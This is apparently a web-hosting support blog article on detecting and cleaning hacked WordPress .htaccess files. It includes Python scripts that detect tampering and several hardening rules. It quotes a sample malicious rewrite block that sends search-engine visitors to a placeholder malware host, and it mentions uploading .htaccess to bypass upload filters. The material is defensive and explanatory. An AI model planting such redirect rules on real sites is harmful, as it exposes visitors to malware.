Let us take a closer look at the hacked WordPress .htaccess file issue. At Bobcares, our WordPress support service can give you a detailed overview of dealing with this security threat.
The htaccess and exploitation
Attackers exploit this file for a variety of purposes, including injecting content, hiding backdoors, and altering php.ini variables, among others. Several .htaccess exploits exist to circumvent server security measures, directory restrictions, and so on.
For example:
Suppose files can be uploaded to a PHP server, but the upload filters prevent a shell from being uploaded directly or indirectly. An attacker can avoid the filters by uploading a .htaccess file instead of shell.png, shell.php;jpg, and so forth. The uploaded .htaccess file will overwrite the old one.
Firstly, this is a hidden file; as a result, some website owners may not see it in their FTP programs. Secondly, because it is a powerful file, modifying the behavior of the web server and PHP becomes simple. This is one of the most important factors. An .htaccess attack is difficult to track down and clean up.
WordPress .htaccess Hacked – Types Of Attacks
There are many forms of .htaccess attacks. Some of them are:
- Hacked .htaccess redirect – redirecting visitors who arrive from search engines to malware.
- Malware redirection of error pages.
- Adding malware to the website.
- Browser fingerprinting and IP logging performed without requiring user participation.
- Watering hole attacks.
If an attacker gains access to a website with only restricted privileges, but is still able to modify .htaccess, this may be used for a variety of exploitation scenarios. Information disclosure is another type of attack that makes use of .htaccess.
How to Determine Whether a Website Is Vulnerable
To determine this, keep a close eye on the website for any unusual redirection. Additionally, make a backup of all .htaccess files to compare with those on the servers. It is also recommended to examine the website for vulnerabilities such as SQL injection and cross-site scripting. These are flaws that an attacker may exploit to gain access to and tamper with the website, eventually spreading malware to users.
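The backup comparison described above can be scripted. The following is an added example, not part of the original article or any Bobcares tooling; the script name, function names and JSON baseline format are assumptions. It records a SHA-256 for every .htaccess under the document root and later reports files that were added, changed or removed.

```python
import hashlib
import json
import sys
from pathlib import Path


def snapshot(root):
    """Map each .htaccess path (relative to root) to the SHA-256 of its contents."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob(".htaccess")
        if p.is_file()
    }


def compare(baseline, current):
    """Report .htaccess files added, changed or removed since the baseline."""
    return {
        # A new .htaccess in an upload directory is a strong warning sign.
        "added": sorted(set(current) - set(baseline)),
        "changed": sorted(
            p for p in current if p in baseline and current[p] != baseline[p]
        ),
        "removed": sorted(set(baseline) - set(current)),
    }


if __name__ == "__main__":
    # Hypothetical usage: htaccess_baseline.py save|check <docroot> <baseline.json>
    # Keep the baseline file off the web server so an intruder cannot rewrite it.
    mode, docroot, store = sys.argv[1:4]
    if mode == "save":
        Path(store).write_text(json.dumps(snapshot(docroot), indent=2))
    else:
        report = compare(json.loads(Path(store).read_text()), snapshot(docroot))
        print(json.dumps(report, indent=2))
        sys.exit(1 if any(report.values()) else 0)
```

The non-zero exit status on any difference makes the check usable from cron or a monitoring job.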
WordPress .htaccess hacked? What to do?
If the above-mentioned redirection is visible, it is advised to inspect the .htaccess files as soon as possible and delete the problematic code. Backdoors are most likely concealed in several folders, so perform a thorough cleaning of the entire site, update WordPress, change all passwords, and so on.
WordPress hacked .htaccess cleanup
Here are some crucial steps for scanning the .htaccess files for signs of hacking.
.htaccess hack Cleanup
The first step is to navigate to cPanel and, in the Files area, select File Manager. Click on Settings in the upper right-hand corner. Then pick the Document Root option and select the domain from the drop-down menu. Check the Show Hidden Files box. After that, click on Save.
Right-click on the .htaccess file and hit Edit. A text editor encoding dialog box will appear; choose Edit. Take a careful look at the document for any disorganized code. If the .htaccess file has been hacked, something like the following will be shown.
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .task.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
This rewrite code checks the referrer of each request. If the visitor arrives from a popular search engine, the request is redirected to the MaliciousDomain.tld website, which then tries to load the malicious bad.php script. Such hacks can go unnoticed for some time, because visitors who reach the site directly are not redirected. Unfortunately, the longer they are active, the greater their impact on search engine rankings.
To erase these harmful rewrites, select all of the content and press Delete. After erasing it, go to the top right and click Save Changes to save the file. If you are unsure whether you have found malicious redirect code, make a backup of the .htaccess file before making any changes. To do this, right-click on the .htaccess file and select Copy, enter a destination such as /public_html/.htaccess-BAK, and then click Copy File.
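The manual inspection above can be automated across every directory of the site. The following is an added example, not code from the original article: it flags any RewriteRule that redirects to a host outside your own when the preceding RewriteCond lines test the referrer or user agent. The function names, the own_hosts allowlist and the sample text (built from the rules shown on this page) are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# Constructed sample: part of the hacked block above plus two legitimate rule sets.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpg|jpeg|png)$ - [F]
RewriteCond %{HTTPS} !on
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
"""

VISITOR_VARS = re.compile(r"%\{(HTTP_REFERER|HTTP_USER_AGENT)\}", re.I)


def find_conditional_redirects(text, own_hosts):
    """Return (line_no, target_host, variables) for each RewriteRule that sends
    visitors to a foreign host only when referrer/user-agent conditions match."""
    findings, conds = [], []
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 2:
            conds.append(parts[1])
        elif directive == "rewriterule" and len(parts) >= 3:
            try:
                host = (urlsplit(parts[2]).hostname or "").lower()
            except ValueError:          # malformed URL in the substitution
                host = ""
            seen = sorted({v.upper() for c in conds for v in VISITOR_VARS.findall(c)})
            if host and host not in own_hosts and seen:
                findings.append((no, host, seen))
            conds = []  # conditions apply only to the RewriteRule that follows them
    return findings


def scan_tree(root, own_hosts):
    """Check every .htaccess under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob(".htaccess"):
        found = find_conditional_redirects(path.read_text(errors="replace"), own_hosts)
        if found:
            hits[str(path)] = found
    return hits
```

On the sample, only the rule on line 4 is reported; the hotlink and HTTPS rules pass because they either do not redirect or redirect to an allowlisted host.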
.htaccess Security
Authorization – Deny access by IP
In most cases, using Allow and Deny with an IP address is better. mod_rewrite, on the other hand, also lets you control access by IP address.
RewriteCond %{REMOTE_ADDR} ^205\.209\.177\.
RewriteRule .* - [F]
Prevent image hotlinking
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpg|jpeg|png)$ - [F]
Protocols – Ensure HTTPS
# based on protocol
# REQUEST_URI always begins with a slash, so the pattern must include it
RewriteCond %{REQUEST_URI} ^/secure_area/
RewriteCond %{HTTPS} !on
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
# alternative using server port
RewriteCond %{REQUEST_URI} ^/secure_area/
RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
Conclusion
To conclude, there are multiple ways for an attacker to hack the .htaccess file on a WordPress site. By following these simple security measures, we can effectively block attackers and prevent them from accessing sensitive data.